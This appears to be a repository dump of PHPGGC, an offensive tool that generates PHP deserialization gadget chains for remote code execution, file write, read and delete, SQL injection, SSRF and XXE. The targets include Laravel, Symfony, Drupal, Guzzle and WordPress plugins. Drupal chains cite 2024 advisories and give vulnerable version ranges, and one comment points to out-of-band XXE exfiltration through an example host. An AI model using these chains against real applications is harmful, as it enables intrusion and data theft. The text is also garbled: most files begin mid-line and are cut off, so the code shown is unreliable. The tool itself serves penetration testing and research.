├── Dockerfile
├── LICENSE
├── README.md
├── gadgetchains
├── Bitrix
│ └── RCE
│ │ ├── chain.php
│ │ └── gadgets.php
├── CakePHP
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 2
│ │ ├── chain.php
│ │ └── gadgets.php
├── CodeIgniter4
│ ├── FD
│ │ ├── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ └── 2
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── FR
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 2
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 3
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 4
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 5
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 6
│ │ ├── chain.php
│ │ └── gadgets.php
├── Doctrine
│ ├── FW
│ │ ├── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ └── 2
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 2
│ │ ├── chain.php
│ │ └── gadgets.php
├── Dompdf
│ └── FD
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 2
│ │ ├── chain.php
│ │ └── gadgets.php
├── Drupal
│ ├── AT
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── FD
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── PsySH
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── RCE
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── SQLI
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── SSRF
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── XXE
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Drupal7
│ ├── FD
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── RCE
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── SQLI
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── SSRF
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Grav
│ └── FD
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Guzzle
│ ├── FW
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── INFO
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── RCE
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Horde
│ └── RCE
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Joomla
│ └── FW
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Kohana
│ └── FR
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Laminas
│ ├── FD
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── FW
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Laravel
│ ├── FD
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 2
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 3
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 4
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 5
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 6
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 7
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 8
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 9
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 10
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 11
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 12
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 13
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 14
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 15
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 16
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 17
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 18
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 19
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 20
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 21
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 22
│ │ ├── chain.php
│ │ └── gadgets.php
├── Magento
│ ├── FW
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── SQLI
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Magento2
│ └── FD
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 2
│ │ ├── chain.php
│ │ └── gadgets.php
├── Monolog
│ ├── FW
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 2
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 3
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 4
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 5
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 6
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 7
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 8
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 9
│ │ ├── chain.php
│ │ └── gadgets.php
├── OpenCart
│ ├── FW
│ │ ├── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ ├── 2
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ └── 3
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 2
│ │ ├── chain.php
│ │ └── gadgets.php
├── PHPCSFixer
│ └── FD
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 2
│ │ ├── chain.php
│ │ └── gadgets.php
├── PHPExcel
│ └── FD
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 2
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 3
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 4
│ │ ├── chain.php
│ │ └── gadgets.php
├── PHPSecLib
│ └── RCE
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── PHPWord
│ └── FD
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Phalcon
│ └── RCE
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Phing
│ └── FD
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Plates
│ └── RCE
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Pydio
│ └── Guzzle
│ │ └── RCE
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Silverstripe
│ └── FD
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Slim
│ └── RCE
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Smarty
│ ├── FD
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── SSRF
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Snappy
│ └── FD
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── Spiral
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 2
│ │ ├── chain.php
│ │ └── gadgets.php
├── SwiftMailer
│ ├── FD
│ │ ├── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ └── 2
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── FR
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── FW
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 2
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 3
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 4
│ │ ├── chain.php
│ │ └── gadgets.php
├── Symfony
│ ├── FD
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── FW
│ │ ├── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ └── 2
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 2
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 3
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 4
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 5
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 6
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 7
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 8
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 9
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 10
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 11
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 12
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 13
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 14
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 15
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 16
│ │ ├── chain.php
│ │ └── gadgets.php
├── TCPDF
│ └── FD
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── ThinkPHP
│ ├── FW
│ │ ├── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ └── 2
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 2
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 3
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 4
│ │ ├── chain.php
│ │ └── gadgets.php
├── Typo3
│ └── FD
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
├── WordPress
│ ├── Dompdf
│ │ └── RCE
│ │ │ ├── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ │ └── 2
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── Guzzle
│ │ └── RCE
│ │ │ ├── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ │ └── 2
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── P
│ │ ├── EmailSubscribers
│ │ │ └── RCE
│ │ │ │ └── 1
│ │ │ │ ├── chain.php
│ │ │ │ └── gadgets.php
│ │ ├── EverestForms
│ │ │ └── RCE
│ │ │ │ └── 1
│ │ │ │ ├── chain.php
│ │ │ │ └── gadgets.php
│ │ ├── WooCommerce
│ │ │ └── RCE
│ │ │ │ ├── 1
│ │ │ │ ├── chain.php
│ │ │ │ └── gadgets.php
│ │ │ │ └── 2
│ │ │ │ ├── chain.php
│ │ │ │ └── gadgets.php
│ │ ├── YetAnotherStarsRating
│ │ │ └── RCE
│ │ │ │ └── 1
│ │ │ │ ├── chain.php
│ │ │ │ └── gadgets.php
│ │ └── YoastSeo
│ │ │ └── FW
│ │ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── PHPExcel
│ │ └── RCE
│ │ │ ├── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ │ ├── 2
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ │ ├── 3
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ │ ├── 4
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ │ ├── 5
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ │ └── 6
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ ├── RCE
│ │ ├── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ │ └── 2
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── generic
│ │ └── gadgets.php
├── Yii
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 2
│ │ ├── chain.php
│ │ └── gadgets.php
├── Yii2
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 2
│ │ ├── chain.php
│ │ └── gadgets.php
├── ZendFramework
│ ├── FD
│ │ └── 1
│ │ │ ├── chain.php
│ │ │ └── gadgets.php
│ └── RCE
│ │ ├── 1
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 2
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 3
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ ├── 4
│ │ ├── chain.php
│ │ └── gadgets.php
│ │ └── 5
│ │ ├── chain.php
│ │ └── gadgets.php
├── phpThumb
│ └── FD
│ │ └── 1
│ │ ├── chain.php
│ │ └── gadgets.php
└── vBulletin
│ └── RCE
│ └── 1
│ ├── chain.php
│ └── gadgets.php
├── lib
├── PHPGGC.php
├── PHPGGC
│ ├── Enhancement
│ │ ├── ASCIIStrings.php
│ │ ├── Enhancement.php
│ │ ├── Enhancements.php
│ │ ├── FastDestruct.php
│ │ ├── PlusNumbers.php
│ │ ├── PublicProperties.php
│ │ └── Wrapper.php
│ ├── Exception.php
│ ├── GadgetChain.php
│ ├── GadgetChain
│ │ ├── AccountTakeover.php
│ │ ├── FileDelete.php
│ │ ├── FileInclude.php
│ │ ├── FileRead.php
│ │ ├── FileWrite.php
│ │ ├── PHPInfo.php
│ │ ├── RCE.php
│ │ ├── RCE
│ │ │ ├── Command.php
│ │ │ ├── FunctionCall.php
│ │ │ └── PHPCode.php
│ │ ├── SQLI
│ │ │ └── MySQLAuthenticatedSQLI.php
│ │ ├── SSRF.php
│ │ ├── SqlInjection.php
│ │ └── XXE.php
│ ├── InvalidArgumentsException.php
│ ├── Phar
│ │ ├── Format.php
│ │ ├── Phar.php
│ │ ├── Tar.php
│ │ └── Zip.php
│ └── Util.php
├── diagnose_payload.php
└── test_payload.php
├── phpggc
├── templates
├── chain.php
└── gadgets.php
└── test-gc-compatibility.py
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM php:8.1-cli-alpine AS builder
2 |
3 | RUN apk add python3 py3-rich curl
4 |
5 | RUN curl -s https://getcomposer.org/installer | php -- --install-dir=/usr/bin/ --filename=composer
6 |
7 | RUN alias composer='php /usr/bin/composer'
8 |
9 | COPY . /phpggc
10 |
11 | WORKDIR /phpggc
12 |
13 | RUN sed -i '1s|.*|#!/usr/bin/env php|' phpggc && chmod +x phpggc && echo "phar.readonly=0" > $PHP_INI_DIR/php.ini
14 |
15 | ENTRYPOINT ["/phpggc/phpggc"]
16 |
--------------------------------------------------------------------------------
/gadgetchains/Bitrix/RCE/chain.php:
--------------------------------------------------------------------------------
1 | redis = new \CodeIgniter\Session\Handlers\MemcachedHandler(
9 | new \CodeIgniter\Cache\Handlers\FileHandler($remote_path),
10 | $remote_path
11 | );
12 | }
13 | }
14 |
15 | class FileHandler {
16 | protected $prefix;
17 | protected $path = "";
18 |
19 | public function __construct($remote_path) {
20 | $this->prefix = dirname($remote_path) . "/";
21 | }
22 | }
23 | }
24 |
25 | namespace CodeIgniter\Session\Handlers {
26 | class MemcachedHandler {
27 | protected $memcached;
28 | protected $lockKey;
29 |
30 | public function __construct($memcached, $remote_path) {
31 | $this->memcached = $memcached;
32 | $this->lockKey = basename($remote_path);
33 | }
34 | }
35 | }
--------------------------------------------------------------------------------
/gadgetchains/CodeIgniter4/FD/2/chain.php:
--------------------------------------------------------------------------------
1 | scratch = $remote_path;
9 | }
10 | }
11 | }
--------------------------------------------------------------------------------
/gadgetchains/CodeIgniter4/FR/1/chain.php:
--------------------------------------------------------------------------------
1 | view = $view;
12 | }
13 | }
--------------------------------------------------------------------------------
/gadgetchains/CodeIgniter4/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | default = $cmd; //open /System/Applications/Calculator.app
12 | }
13 | }
14 | }
15 |
16 | namespace Faker
17 | {
18 | class ValidGenerator
19 | {
20 | protected $generator;
21 | protected $validator;
22 | protected $maxRetries;
23 |
24 | public function __construct($generator, $func)
25 | {
26 | $this->maxRetries = 1; //执行次数
27 | $this->validator = $func;
28 | $this->generator = $generator;
29 | }
30 | }
31 | }
32 |
33 | namespace CodeIgniter\Cache\Handlers
34 | {
35 | class RedisHandler
36 | {
37 | protected $redis;
38 |
39 | function __construct($function, $parameter)
40 | {
41 | $this->redis = new \Faker\ValidGenerator(new \Faker\DefaultGenerator($parameter), $function);
42 | }
43 | }
44 | }
45 |
--------------------------------------------------------------------------------
/gadgetchains/CodeIgniter4/RCE/4/chain.php:
--------------------------------------------------------------------------------
1 | connection = new \Faker\ValidGenerator($function,$paramter);
11 | $this->position = 0;
12 | $this->size = 1;
13 | }
14 | }
15 | }
16 |
17 | namespace Faker{
18 | class ValidGenerator{
19 | protected $generator;
20 | protected $maxRetries;
21 | protected $validator;
22 |
23 | function __construct($function,$param)
24 | {
25 | $this->maxRetries = 1;
26 | $this->validator = $function;
27 | $this->generator = new \Faker\DefaultGenerator($param);
28 | }
29 | }
30 |
31 | class DefaultGenerator{
32 | protected $default;
33 |
34 | function __construct($param)
35 | {
36 | $this->default = $param;
37 | }
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/gadgetchains/Doctrine/FW/2/chain.php:
--------------------------------------------------------------------------------
1 | deferredItems = ['x' => $CacheItem];
12 | $this->cache = $FilesystemCache;
13 | }
14 | }
15 | class CacheItem
16 | {
17 | private $value;
18 |
19 | public function __construct($phpCode)
20 | {
21 | $this->value = $phpCode;
22 | }
23 | }
24 | }
25 |
26 | namespace Doctrine\Common\Cache
27 | {
28 | class FileCache
29 | {
30 | private $extension;
31 | protected $directory;
32 | private $umask = 0002;
33 |
34 | public function __construct($extension, $directory)
35 | {
36 | $this->extension = $extension;
37 | $this->directory = $directory;
38 | }
39 | }
40 |
41 | class FilesystemCache extends FileCache {}
42 | }
43 |
--------------------------------------------------------------------------------
/gadgetchains/Doctrine/RCE/1/gadgets.php:
--------------------------------------------------------------------------------
1 | loader = 1;
25 | $redisProxy = new RedisProxy($parameter);
26 | $redisProxy->initializer = new SchemaAssetsFilterManager($function);
27 | $obj->deferredItems = [$redisProxy];
28 | return $obj;
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/gadgetchains/Doctrine/RCE/2/gadgets.php:
--------------------------------------------------------------------------------
1 | redis = $parameter;
22 | }
23 |
24 | }
25 | }
26 |
27 | namespace Doctrine\Bundle\DoctrineBundle\Dbal
28 | {
29 | class SchemaAssetsFilterManager
30 | {
31 | public $schemaAssetFilters;
32 | public function __construct ($function)
33 | {
34 | $this->schemaAssetFilters = [$function];
35 | }
36 | }
37 | }
--------------------------------------------------------------------------------
/gadgetchains/Dompdf/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | imageCache, $remote_path);
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/gadgetchains/Dompdf/FD/2/chain.php:
--------------------------------------------------------------------------------
1 | _dompdf = new Dompdf();
13 | array_push($this->_image_cache, $remote_path);
14 | }
15 | }
16 | }
17 |
18 | namespace Dompdf {
19 | class Options {
20 | public $debugPng = false;
21 | }
22 |
23 | class Dompdf {
24 | public $options;
25 |
26 | public function __construct() {
27 | $this->options = new Options();
28 | }
29 | }
30 | }
--------------------------------------------------------------------------------
/gadgetchains/Drupal/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | = 10.3.0 < 10.3.9 || >= 11.0.0 < 11.0.8';
8 | public static $vector = '__wakeup';
9 | public static $author = 'mcdruid';
10 | public static $information = 'See: https://www.drupal.org/sa-core-2024-006';
11 |
12 | public function generate(array $parameters)
13 | {
14 | return new \Drupal\Core\Config\StorageComparer(
15 | new \Drupal\Component\PhpStorage\FileStorage(
16 | $parameters['remote_path']
17 | )
18 | );
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/gadgetchains/Drupal/FD/1/gadgets.php:
--------------------------------------------------------------------------------
1 | targetCacheStorage = $targetCacheStorage;
9 | }
10 | }
11 | }
12 |
13 | namespace Drupal\Component\PhpStorage {
14 | class FileStorage {
15 | protected $directory;
16 | public function __construct($directory)
17 | {
18 | $this->directory = $directory;
19 | }
20 | }
21 | }
--------------------------------------------------------------------------------
/gadgetchains/Drupal/PsySH/1/chain.php:
--------------------------------------------------------------------------------
1 | = v0.9.0 < v0.12.6';
8 | public static $vector = '__wakeup';
9 |
10 | public static $author = 'mcdruid';
11 | public static $information = 'See: https://www.drupal.org/sa-core-2024-007
12 | This requires PsySH which is bundled with drush. It is common but not
13 | mandatory for drush to be installed along with Drupal core. Other PHP
14 | functions could be executed, but no parameters can be passed.';
15 |
16 | public function generate(array $parameters)
17 | {
18 | return (
19 | new \Drupal\views\ViewExecutable(
20 | new \Psy\ExecutionClosure('phpinfo'),
21 | new \Drupal\Views\DisplayPluginCollection(),
22 | new \Drupal\views\Plugin\views\display\DefaultDisplay()
23 | )
24 | );
25 | }
26 | }
--------------------------------------------------------------------------------
/gadgetchains/Drupal/SQLI/1/gadgets.php:
--------------------------------------------------------------------------------
1 | = 8.0.0 < 10.2.11 || >= 10.3.0 < 10.3.9';
8 | public static $vector = '__wakeup';
9 | public static $author = 'mcdruid';
10 | public static $information = 'See: https://gist.github.com/paul-axe/2a384bb5f2d430dd3b63b2484af960f4
11 | See: https://www.drupal.org/sa-core-2024-008
12 | https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-exfiltrate-data-out-of-band';
13 |
14 | public function generate(array $parameters)
15 | {
16 | return new \Drupal\Core\Url(
17 | new \Drupal\Core\Database\StatementPrefetch(
18 | 'SimpleXMLElement',
19 | [
20 | $parameters['uri'], // e.g. 'http://10.11.12.13/xxe.xml'
21 | LIBXML_BIGLINES | LIBXML_DTDLOAD | LIBXML_NOENT | LIBXML_PARSEHUGE,
22 | true
23 | ]
24 | )
25 | );
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/gadgetchains/Drupal/SSRF/1/gadgets.php:
--------------------------------------------------------------------------------
1 | _serviceIds = $serviceIds;
9 | }
10 |
11 | }
12 | }
13 |
14 | namespace Drupal\Core\Database {
15 | class StatementPrefetch
16 | {
17 | protected $currentRow = array();
18 | protected $fetchStyle = 8; // PDO::FETCH_CLASS
19 | protected $fetchOptions = array();
20 |
21 | function __construct($class, $constructor_args)
22 | {
23 | $this->fetchOptions['class'] = $class;
24 | $this->fetchOptions['constructor_args'] = $constructor_args;
25 | }
26 | }
27 | }
--------------------------------------------------------------------------------
/gadgetchains/Drupal/XXE/1/chain.php:
--------------------------------------------------------------------------------
1 | = 8.0.0 < 10.2.11 || >= 10.3.0 < 10.3.9';
8 | public static $vector = '__wakeup';
9 | public static $author = 'mcdruid';
10 | public static $information = 'See: https://gist.github.com/paul-axe/2a384bb5f2d430dd3b63b2484af960f4
11 | See: https://www.drupal.org/sa-core-2024-008
12 | This version accepts a local XML file path instead of a URI.
13 | Example payload file could contain:
14 | ]>&xxe;';
15 |
16 | public function generate(array $parameters)
17 | {
18 | return new \Drupal\Core\Url(
19 | new \Drupal\Core\Database\StatementPrefetch(
20 | 'SimpleXMLElement',
21 | [
22 | $parameters['xml_content'],
23 | LIBXML_BIGLINES | LIBXML_DTDLOAD | LIBXML_NOENT | LIBXML_PARSEHUGE
24 | ]
25 | )
26 | );
27 | }
28 | }
--------------------------------------------------------------------------------
/gadgetchains/Drupal/XXE/1/gadgets.php:
--------------------------------------------------------------------------------
1 | _serviceIds = $serviceIds;
11 | }
12 |
13 | }
14 | }
15 |
16 | namespace Drupal\Core\Database {
17 | class StatementPrefetch
18 | {
19 | protected $currentRow = array();
20 | protected $fetchStyle = 8; // PDO::FETCH_CLASS
21 | protected $fetchOptions = array();
22 |
23 | function __construct($class, $constructor_args)
24 | {
25 | $this->fetchOptions['class'] = $class;
26 | $this->fetchOptions['constructor_args'] = $constructor_args;
27 | }
28 | }
29 | }
--------------------------------------------------------------------------------
/gadgetchains/Drupal7/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | _temp_tarname = $_temp_tarname;
9 | }
10 |
11 | }
12 |
--------------------------------------------------------------------------------
/gadgetchains/Drupal7/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | true, '#process'=>true, '#attached'=>true];
7 | protected $storage = ['#form_id'=>'DrupalRCE','#process'=>['drupal_process_attached'], '#attached'=>[]];
8 |
9 | public function __construct($function,$parameter) {
10 | $this->storage['#attached']+=[$function=>[[$parameter]]];
11 | }
12 | }
--------------------------------------------------------------------------------
/gadgetchains/Drupal7/SQLI/1/gadgets.php:
--------------------------------------------------------------------------------
1 | keysToPersist = $keysToPersist;
10 | }
11 | }
12 |
13 | class DatabaseStatementPrefetch
14 | {
15 | protected $currentRow = [];
16 | protected $fetchStyle = 8; // PDO::FETCH_CLASS
17 | protected $fetchOptions = [];
18 |
19 | function __construct($class, $constructor_args)
20 | {
21 | $this->fetchOptions['class'] = $class;
22 | $this->fetchOptions['constructor_args'] = $constructor_args;
23 | }
24 | }
25 |
--------------------------------------------------------------------------------
/gadgetchains/Grav/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | tmp = $tmp;
11 | }
12 | }
13 | }
--------------------------------------------------------------------------------
/gadgetchains/Guzzle/FW/1/chain.php:
--------------------------------------------------------------------------------
1 | data = [
12 | 'Expires' => 1,
13 | 'Discard' => false,
14 | 'Value' => $data
15 | ];
16 | }
17 | }
18 |
19 | class CookieJar
20 | {
21 | private $cookies = [];
22 | private $strictMode;
23 |
24 | public function __construct($data)
25 | {
26 | $this->cookies = [new SetCookie($data)];
27 | }
28 | }
29 |
30 | class FileCookieJar extends CookieJar
31 | {
32 | private $filename;
33 | private $storeSessionCookies = true;
34 |
35 | public function __construct($filename, $data)
36 | {
37 | parent::__construct($data);
38 | $this->filename = $filename;
39 | }
40 | }
41 | }
--------------------------------------------------------------------------------
/gadgetchains/Guzzle/INFO/1/chain.php:
--------------------------------------------------------------------------------
1 | _fn_close)) {
13 | call_user_func($this->_fn_close);
14 | }
15 | }
16 |
17 | public function close()
18 | {
19 | return call_user_func($this->_fn_close);
20 | }
21 | */
22 | }
23 | }
--------------------------------------------------------------------------------
/gadgetchains/Guzzle/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | [
24 | new \GuzzleHttp\HandlerStack($function, $parameter),
25 | 'resolve'
26 | ]
27 | ]);
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/gadgetchains/Horde/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 |
23 |
--------------------------------------------------------------------------------
/gadgetchains/Joomla/FW/1/chain.php:
--------------------------------------------------------------------------------
1 | _file = $_file;
9 | }
10 | }
--------------------------------------------------------------------------------
/gadgetchains/Laminas/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | cleanup = '1';
10 | $this->streamName = $remote_path;
11 | }
12 | }
13 | }
14 |
--------------------------------------------------------------------------------
/gadgetchains/Laravel/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | file = $file;
12 | }
13 | }
14 | }
15 |
16 | namespace Laravel\Pail\Console\Commands
17 | {
18 | class PailCommand
19 | {
20 | public $file;
21 |
22 | public function __construct($file)
23 | {
24 | $this->file = new \Laravel\Pail\File($file);
25 | }
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | events = $events;
13 | $this->event = $cmd;
14 | }
15 | }
16 | }
17 |
18 |
19 | namespace Faker
20 | {
21 | class Generator
22 | {
23 | protected $formatters;
24 |
25 | function __construct($function)
26 | {
27 | $this->formatters = ['dispatch' => $function];
28 | }
29 | }
30 | }
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/10/chain.php:
--------------------------------------------------------------------------------
1 | condition = $condition;
10 | }
11 | }
12 | }
13 |
14 | namespace Illuminate\Auth
15 | {
16 | class RequestGuard
17 | {
18 | public function __construct($callback, $request, $provider)
19 | {
20 | $this->callback = $callback;
21 | $this->request = $request;
22 | $this->provider = $provider;
23 | }
24 | }
25 | }
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/11/chain.php:
--------------------------------------------------------------------------------
1 | events = new \Illuminate\Database\DatabaseManager($function, $paramter);
11 | }
12 | }
13 | }
14 |
15 | namespace Illuminate\Database {
16 | class DatabaseManager
17 | {
18 | protected $app;
19 | protected $extensions;
20 |
21 | function __construct($function, $paramter)
22 | {
23 | $this->app = [
24 | "config" => [
25 | "database.default" => $function,
26 | "database.connections" => [
27 | $function => array($paramter)
28 | ]
29 | ]
30 | ];
31 | $this->extensions[$function] = "array_filter"; //or array_walk
32 | }
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/gadgetchains/Laravel/RCE/14/chain.php:
